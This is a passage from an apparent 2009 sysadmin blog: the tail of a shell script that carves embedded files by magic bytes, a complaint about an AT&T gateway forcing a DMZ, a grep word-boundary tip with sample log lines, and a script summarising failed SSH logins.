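        while ((i = index(s, m)) > 0) {
            hexpos = base + i - 1                   # 0-based index into the hex string
            if (hexpos % 2 == 0) print hexpos / 2   # only byte-aligned hits are real
            base += i; s = substr(s, i + 1)
        }
    }'
}

# magic_of FILE -> short type name derived from the first bytes
magic_of() {
    h=$(od -An -N 8 -tx1 "$1" | tr -d ' \n')
    case $h in
        504b0304*)
            # ODF: first local zip entry (name starts at offset 30) is "mimetype"
            if [ "$(dd if="$1" bs=1 skip=30 count=8 2>/dev/null)" = mimetype ]; then
                echo odf
            else
                echo zip
            fi ;;
        1f8b08*)   echo gzip ;;
        25504446*) echo pdf ;;
        89504e47*) echo png ;;
        *)         echo unknown ;;
    esac
}

# carve_one BLOB START END OUTDIR -> writes OUTDIR/START.<type>, prints "START type path"
carve_one() {
    tmp="$4/$2.part"
    dd if="$1" of="$tmp" bs=1 skip="$2" count=$(($3 - $2)) 2>/dev/null
    t=$(magic_of "$tmp")
    mv "$tmp" "$4/$2.$t"
    echo "$2 $t $4/$2.$t"
}

# carve_all BLOB OUTDIR -> carves every object whose header we know
carve_all() {
    mkdir -p "$2"
    size=$(wc -c < "$1")
    for m in 504b0304 1f8b08 25504446 89504e47; do offsets_of "$1" "$m"; done |
    sort -n | uniq | {
        prev=""
        while read -r off; do
            if [ -n "$prev" ]; then carve_one "$1" "$prev" "$off" "$2"; fi
            prev=$off
        done
        if [ -n "$prev" ]; then carve_one "$1" "$prev" "$size" "$2"; fi
    }
}

# make_sample_blob OUT: constructed "stream" with three embedded headers
make_sample_blob() {
    {
        printf 'leading stream data that is not a file\n'
        # zip local file header: sig, version 20, then flags/method/time/date/
        # crc/sizes all zero (20 bytes), name length 8, extra length 0
        printf '\120\113\003\004\024\000'
        printf '\000\000\000\000\000\000\000\000\000\000'
        printf '\000\000\000\000\000\000\000\000\000\000'
        printf '\010\000\000\000'
        printf 'mimetypeapplication/vnd.oasis.opendocument.text'
        printf 'PADDING'
        # gzip member header (1f 8b, method 08); no real deflate stream follows
        printf '\037\213\010\000\000\000\000\000\000\003'
        printf 'compressed bytes would follow here'
        printf '%%PDF-1.4\n1 0 obj << >> endobj\n%%%%EOF\n'
    } > "$1"
}
```

Usage: make_sample_blob /tmp/blob; carve_all /tmp/blob /tmp/carved. The odf/zip distinction is why the renamed file opened in OpenOffice: the carved object was a zip all along, and the name only told the desktop which application to hand it to.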
Tuesday, August 18, 2009
Another Open Letter to AT&T
Dear AT&T:
On occasion to support my position at work I have to use my home system. One of the things I do is run Nmap (network mapper) on work's Net-Block. I use it to find out what ports are open, and make sure that only the ones that should be are open. I usually do this via an SSH connection from work.
Each time, coming home, I've had problems using my home PC. Trying to access anything on the internet, anything that wasn't an active session when AT&T / 2WIRE did their magic, brings up an error page. Other things, like my mail monitoring tool, don't have that problem, and when I opened my web email, it worked. However going to other sites from there brings the error page back up, and sets off ABE (Application Boundaries Enforcer).
The error page says it's detected "a router behind a router". Which isn't the case. The "FIX / Resolve" for the issue, placing my home system INTO A NON-PROTECTED DMZ, is not an acceptable solution. While I don't have a lot of ports open, I'd still prefer if people didn't have easy access to them. Here is the section saying that everything is open.
"Allow all applications (DMZplus mode) – Set the selected computer in DMZplus mode. All inbound traffic, except traffic which has been specifically assigned to another computer using the “Allow individual applications” feature, will automatically be directed to this computer. The DMZplus-enabled computer is less secure because all unassigned firewall ports are opened for that computer."
STOP PUTTING MY EQUIPMENT AT RISK TO BLACK HATS AT&T. FIX YOUR SYSTEM.
Saturday, August 8, 2009
Fun with grep
I got a copy of the Grep Pocket Reference back in early July via PDF format (from O'Reilly's Safari Bookshelf). I read through it but didn't really learn that much.
Last week the hard copy version arrived (2 weeks after I ordered it from Amazon). I've been reading it the last week. The parts I'm going through right now talks about Regular Expressions (regex). I've read about regex more times than I can count, in classes, in shell scripting books, on the web. This time it made sense.
My firewall log parsing for IP addresses has really improved. For example, I'd usually do "grep '< my ip address >' /external/logs/firewall1". The problem is my address at work is .18, but it would pull .181 - .189 also. The first thing I did was backslash the . (dots) in the IP address. It cleaned up some stuff from the logs but not much. It's nicer to know that it's not looking for any character and only matching what I want it to.
Which was a problem I was having when I wrote Failed (the script below) a few years ago.
Yesterday I read about word boundaries. I tested it this morning with my work IP address, and no longer am I getting the .181 - .189 addresses. Which is fun. It'll make looking for some things easier in the logs at work.
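The three patterns from the paragraphs above, as an added example rather than the post's own commands, run against constructed firewall log lines so the difference is countable. 192.0.2.18 stands in for the work address and the log layout, hosts and ports are made up; the last line is deliberately bogus to show what an unescaped dot accepts.

```sh
#!/bin/sh
# Added example (not from the post): unescaped dots vs escaped dots vs word
# boundaries when grepping for one IP address. Sample lines are constructed.

LOG='Aug  8 09:12:01 fw1 kernel: ACCEPT IN=eth0 SRC=192.0.2.18 DST=198.51.100.7 PROTO=TCP DPT=22
Aug  8 09:12:03 fw1 kernel: DROP IN=eth0 SRC=192.0.2.181 DST=198.51.100.7 PROTO=TCP DPT=445
Aug  8 09:12:05 fw1 kernel: DROP IN=eth0 SRC=192.0.2.189 DST=198.51.100.7 PROTO=TCP DPT=23
Aug  8 09:12:07 fw1 kernel: DROP IN=eth0 SRC=198.51.100.9 DST=192.0.2.180 PROTO=UDP DPT=53
Aug  8 09:12:09 fw1 kernel: ACCEPT IN=eth0 SRC=198.51.100.7 DST=192.0.2.18 PROTO=TCP DPT=22
Aug  8 09:12:11 fw1 kernel: DROP IN=eth0 SRC=192x0y2z18 DST=198.51.100.7 PROTO=TCP DPT=80'

# Each filter reads log lines on stdin and prints the ones it matches.
naive_match()   { grep '192.0.2.18'; }        # "." matches any character: 6 of the 6 lines
escaped_match() { grep '192\.0\.2\.18'; }     # literal dots, but still a prefix of .180-.189
exact_match()   { grep -w '192\.0\.2\.18'; }  # word boundary on both ends: only the real .18
# Stricter still: refuse a neighbouring digit or dot, not just a word character,
# so "192.0.2.18.5" or "1192.0.2.18" would not pass either.
strict_match()  { grep -E '(^|[^0-9.])192\.0\.2\.18([^0-9.]|$)'; }

# count_with FILTER -> number of sample lines FILTER lets through
count_with() { printf '%s\n' "$LOG" | "$1" | wc -l | tr -d ' '; }

for f in naive_match escaped_match exact_match strict_match; do
    echo "$f: $(count_with "$f")"
done
```

grep -w counts letters, digits and underscore as word characters, so a dot, colon or slash right after the address still counts as a boundary; that is usually what you want in a firewall log (SRC=192.0.2.18 and 192.0.2.18:22 both match), and strict_match is for the cases where the address could be the tail of a longer dotted string.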
-------
Just for fun, here is what the finished version of Failed looked like (modified slightly):
#! /bin/sh
# checks /var/log/auth.log for login failures.
# version 0.2
# < my email address removed >
# sshd log file; on Red Hat based systems this is /var/log/secure
LOG=/var/log/auth.log
# prints failed invalid users (awk fields: date, time, IP, attempted user name)
echo "Failed Invalid User Attempts"
sudo grep "Failed" "$LOG" | grep -i 'invalid' | grep -v '< work login id removed >' | awk '{print $1,$2,$3,$13,$11}' | sort -u
echo ' '
# prints failed valid users, except for me (awk fields: date, time, IP, user name)
echo "Failed Valid User Attempts"
sudo grep "Failed" "$LOG" | grep -vi 'invalid' | grep -v '< work login id removed >' | grep -v '< home login id removed >' | awk '{print $1,$2,$3,$11,$9}' | sort -u
echo ' '
------
I sudo the 2 lines, because I need to be root to access that log file. I didn't want to setuid the script to run, nor did I want to be root when I ran it. It also requires me to type my password to run it, since sudo only remembers my password for 5 minutes.
To make this work on Red Hat based systems, point it at /var/log/secure instead of /var/log/auth.log; sshd writes the same "Failed password for ..." lines there, so the awk field numbers stay the same.
Labels:
computer security,
computers,
I get paid for this,
networking